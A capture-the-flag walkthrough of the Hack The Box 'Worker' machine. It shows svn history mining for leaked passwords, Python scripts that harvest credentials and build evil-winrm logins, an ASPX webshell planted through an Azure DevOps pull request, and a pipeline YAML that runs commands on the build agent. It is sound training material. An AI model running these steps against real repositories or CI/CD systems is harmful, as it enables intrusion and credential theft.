Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field.
Header

Worker is a Medium level Windows machine. Based on the creator and community statistics, this box is highly customized and will require us to put some extra effort into the enumeration phase.
Statistics

Information Gathering

Nmap:

Scanning the target with Nmap, we limit the scan to the ports of interest (-p), fingerprint the services and their versions (-sV), and run the default script set (-sC), which pulls back extra detail and automates some of our first steps. When the scan completes, Nmap writes the results in all three output formats to our Extracts folder (-oA). The ports map to HTTP (80), Subversion's svnserve (3690) and WinRM (5985), which already suggests the shape of the box: a source repository to mine for credentials and a remote-management service to use them on.
>> nmap -p80,3690,5985 -sC -sV -oA Extracts/Worker 10.10.10.203
Nmap

Subversion

Using the SVN CLI tool, let’s connect to the server and list out the directories and files available.
>> svn ls svn://10.10.10.203
List

There’s a dimension.worker.htb reference that we can add to our hosts file, as well as a directory containing the website and a moved.txt file. Our next step is to check the contents out to our local machine (svn cp is a repository-side copy that needs an existing working copy; checkout is what we want here).
>> svn co svn://10.10.10.203 ./svn
Copy

Worker site

Digging around the dimension.worker.htb site, we come across a collection of additional subdomains, including alpha, cartoon, lens, solid-state, spectral, and story. None of these sites appeared to have anything of value on their own, but the hostnames are worth adding to the hosts file, since one of them matters later.
Worker

Version History

Reading the moved.txt file, it looks like the latest version of the site has been migrated to devops.worker.htb.
Moved

One of the main features of version control is that it keeps every previous iteration of a file, so anything a developer later removed is still retrievable. Using the SVN CLI, we can read the commit log for messages that hint at something worth pulling back.
>> svn log svn://10.10.10.203
Log

Let’s check out the changes lining up with r2, “Added deployment script”.
>> svn co -r2 svn://10.10.10.203/ ./r2
Checkout
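The manual walk above (read the log, check out the one revision whose message looks interesting) misses anything committed with a bland message. The script below is an added example for this write-up, not code from the original post: it lists every revision with `svn log --xml -v`, reads each file touched at that revision, and greps it for credential-looking values. The one svn detail worth knowing is the peg revision: `svn cat URL@REV` reads a file that no longer exists at HEAD, whereas `svn cat -r REV URL` resolves the path at HEAD first and fails for deleted files. The repository URL must be the repository root, because `svn log -v` reports root-relative paths. The `svn` runner is swappable, and the log XML and file contents at the bottom are constructed sample data (the "Added deployment script" message is from the write-up; the other messages, paths and the password are placeholders).

```python
"""Mine every revision of a Subversion repository for leaked credentials (added example)."""
import re
import subprocess
import xml.etree.ElementTree as ET

# What usually leaks into deployment scripts: `password = "..."` style
# assignments and credentials embedded in URLs (scheme://user:pass@host).
SECRET_PATTERNS = [
    re.compile(r"(?i)(?:pass(?:word|wd)?|pwd|secret|token|api[_-]?key)\s*[:=]\s*['\"]?([^\s'\",;]+)"),
    re.compile(r"://[^/\s:@]+:([^@\s/]+)@"),
]


def run_svn(args):
    """Default runner: execute `svn <args>` and return stdout as text."""
    return subprocess.run(["svn", *args], check=True, capture_output=True,
                          text=True, errors="replace").stdout


def list_revisions(repo_root_url, run=run_svn):
    """Return [(rev, author, message, [(action, path), ...])], oldest first."""
    root = ET.fromstring(run(["log", "--xml", "-v", repo_root_url]))
    revisions = []
    for entry in root.findall("logentry"):
        changes = [(p.get("action"), p.text) for p in entry.findall("./paths/path")
                   if p.get("kind", "file") != "dir"]  # older servers omit `kind`
        revisions.append((int(entry.get("revision")),
                          (entry.findtext("author") or "").strip(),
                          (entry.findtext("msg") or "").strip(), changes))
    return sorted(revisions)


def find_secrets(text):
    """Return secret-looking values in `text`, deduplicated, in order of appearance."""
    hits = [(m.start(1), m.group(1)) for pat in SECRET_PATTERNS for m in pat.finditer(text)]
    found = []
    for _, value in sorted(hits):
        # `$password = $plain` or `%PW%` is a reference to a variable, not a secret.
        if value.startswith(("$", "%")) or value in found:
            continue
        found.append(value)
    return found


def scan_history(repo_root_url, run=run_svn):
    """Return [(rev, path, secret)] for every revision of every file ever committed."""
    base = repo_root_url.rstrip("/")
    findings = []
    for rev, _author, _msg, changes in list_revisions(repo_root_url, run):
        for action, path in changes:
            if action == "D":
                continue  # nothing to read; the content was scanned when it was added/modified
            try:
                content = run(["cat", f"{base}{path}@{rev}"])  # peg revision, survives later deletion
            except subprocess.CalledProcessError:
                continue  # a directory, or a path we are not authorised to read
            findings.extend((rev, path, secret) for secret in find_secrets(content))
    return findings


# --- Constructed sample data, not the real repository's contents -------------------------
SAMPLE_LOG_XML = """<?xml version="1.0" encoding="UTF-8"?>
<log>
<logentry revision="3"><author>nathen</author><date>2020-06-20T14:00:00.000000Z</date>
<paths><path kind="file" action="D">/dimension.worker.htb/deploy.ps1</path>
<path kind="file" action="A">/moved.txt</path></paths>
<msg>Constructed: moved to devops</msg></logentry>
<logentry revision="2"><author>nathen</author><date>2020-06-20T13:00:00.000000Z</date>
<paths><path kind="file" action="A">/dimension.worker.htb/deploy.ps1</path></paths>
<msg>Added deployment script</msg></logentry>
<logentry revision="1"><author>nathen</author><date>2020-06-20T12:00:00.000000Z</date>
<paths><path kind="dir" action="A">/dimension.worker.htb</path>
<path kind="file" action="A">/dimension.worker.htb/index.html</path></paths>
<msg>First version</msg></logentry>
</log>
"""
SAMPLE_FILES = {  # keyed by the URL@REV that `svn cat` receives
    "svn://10.10.10.203/dimension.worker.htb/index.html@1": "<html><body>Dimension</body></html>\n",
    "svn://10.10.10.203/dimension.worker.htb/deploy.ps1@2": (
        "$user = 'nathen'\n"
        "$password = 'Constructed-Pass-123'\n"   # placeholder, not the real password
        "svn co svn://$user:$password@10.10.10.203/dimension.worker.htb C:\\inetpub\\wwwroot\n"),
    "svn://10.10.10.203/moved.txt@3": "This repository has been moved to devops.worker.htb\n",
}


def fake_run(args):
    """Stand-in for run_svn that answers from the constructed sample above."""
    if args[:3] == ["log", "--xml", "-v"]:
        return SAMPLE_LOG_XML
    if args[0] == "cat" and args[1] in SAMPLE_FILES:
        return SAMPLE_FILES[args[1]]
    raise subprocess.CalledProcessError(1, ["svn", *args])


if __name__ == "__main__":
    for rev, path, secret in scan_history("svn://10.10.10.203", run=fake_run):
        print(f"r{rev} {path}: {secret}")
    # Against the live box: scan_history("svn://10.10.10.203")
```

Against the real repository, drop the `run=fake_run` argument; the deleted deployment script is found at r2 even though it is gone from HEAD, and the variable-reference filter keeps `$password`-style indirections out of the results.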

Credentials

Looks like we’ve found Nathen’s credentials in the deployment script.
Deploy

Authentication

Navigating to the devops site referenced in the moved.txt file, we’re hit with a login screen. Let’s try out Nathen’s credentials.
Devops

Azure DevOps

Azure DevOps is a platform for storing, building, testing, and deploying source code with CI/CD (Continuous Integration / Continuous Delivery) pipelines. Whenever a change is committed, a pipeline running on a build agent checks the code out and pushes it to the target resources, so the agent necessarily holds whatever credentials that deployment needs. Anyone who can get a change merged inherits that access, and that is what we should be able to leverage here.
Devops Authenticated

Foothold

Deploying our Webshell

From the Spectral Repository, we’ll first create a new branch for us to make changes to.
Branch

Upload our ASPX Webshell to the branch.
Upload

With our changes made, we can create a pull request to merge them in and trigger the CI/CD process. This will deploy the shell to http://spectral.worker.htb/shell.aspx
Pull Request

Approving and completing the PR merges our branch, which kicks off the deployment.
Pull Request Complete

Webshell

Navigating to our webshell, we’re able to look around the machine for interesting files and information. In W:/svnrepos/www/conf/, the configuration directory of the svnserve repository we enumerated earlier, the passwd file stores plaintext credentials for a wide range of users.
Credentials

Comparing the discovered credentials with the list of users we see in the C:/Users/ directory, it looks like user robisl will be our way in.
Users
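The svnserve passwd file is an INI file whose `[users]` section holds `username = password` in plaintext, so cross-referencing it with C:/Users is a small parsing job. The script below is an added example for this write-up, not the original post's code. Two details matter in practice: Python's configparser lowercases keys by default and would silently alter the usernames, so the parser is hand-rolled; and Windows account names are case-insensitive, so the match is case-folded and the local spelling is what gets handed to evil-winrm. The sample file and directory listing are constructed, apart from robisl/wolves11, which the write-up gives.

```python
"""Cross-reference an svnserve passwd file with local Windows accounts (added example)."""


def parse_svn_passwd(text):
    """Return {username: password} from the [users] section of an svnserve passwd file.

    Only the first '=' splits, so passwords containing '=' survive intact;
    comments start with '#', and other sections are ignored.
    """
    users, in_users = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_users = line.lower() == "[users]"
            continue
        if in_users and "=" in line:
            name, _, password = line.partition("=")
            users[name.strip()] = password.strip()
    return users


def match_local_accounts(creds, local_users):
    """Pair leaked credentials with accounts that exist on the box.

    Windows account names are case-insensitive, so compare folded and return
    the local spelling, ready to pass to evil-winrm -u.
    """
    local = {u.lower(): u for u in local_users}
    return [(local[n.lower()], p) for n, p in creds.items() if n.lower() in local]


# Constructed sample; the real passwd file listed far more users.
SAMPLE_PASSWD = """\
### svnserve password file
[users]
nathen = Constructed-Pass-123
hugh = Constructed=With=Equals
robisl = wolves11
"""
SAMPLE_USERS_DIR = ["Administrator", "Default", "Public", "robisl"]  # constructed C:\Users listing

if __name__ == "__main__":
    for user, password in match_local_accounts(parse_svn_passwd(SAMPLE_PASSWD), SAMPLE_USERS_DIR):
        print(f"evil-winrm -i 10.10.10.203 -u {user} -p '{password}'")
```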

WinRM

Now that we have credentials for the target box, we can use Evil-WinRM to get a shell over the WinRM port (5985) that Nmap found.
>> evil-winrm -i 10.10.10.203 -u robisl -p wolves11
WinRM

User Flag

>> type ../Desktop/user.txt
User Flag

Privilege Escalation

Using robisl’s credentials, let’s try to log into the Azure DevOps platform and see what kind of access he has.
Devops

Azure DevOps Pipeline

Another feature of Azure DevOps is build pipelines. A pipeline is the automation that builds and tests an application, defined as an ordered list of tasks that execute on a build agent. Since the agent here is self-hosted on the target (it is what deployed our webshell to the box), any command we put in a task runs on the server under the agent's account. That is our route to the root flag.

Navigate to Pipelines > New Pipeline
Pipeline

Select Azure Repos Git
Pipeline 2

Choose the PartsUnlimited repository, and then the Starter Pipeline. Here, we’ll edit the pipeline so that it prints the contents of the root flag file straight into its job output.
Pipeline 3
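A minimal pipeline definition for that last step, added here as an example and not taken from the write-up. `pool.name` must be the self-hosted agent pool the project exposes (check Project settings > Agent pools; the name below is a placeholder), and the flag path assumes the usual HTB location, which the write-up does not state. `powershell:` is the shortcut for a PowerShell task on a Windows agent; `script:` would run cmd.exe instead. `whoami` in the same step shows which account the agent, and therefore our command, runs as.

```yaml
# Added example: azure-pipelines.yml for a self-hosted Windows agent.
# Pool name and flag path are assumptions, not values from the write-up.
trigger: none          # run it manually from the pipeline page; no commit needed

pool:
  name: Default        # placeholder: use the self-hosted pool the project actually exposes

steps:
- powershell: |
    whoami                                   # the step runs as the agent's service account
    Get-Content C:\Users\Administrator\Desktop\root.txt
  displayName: Read root flag
```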

Root Flag

Root Flag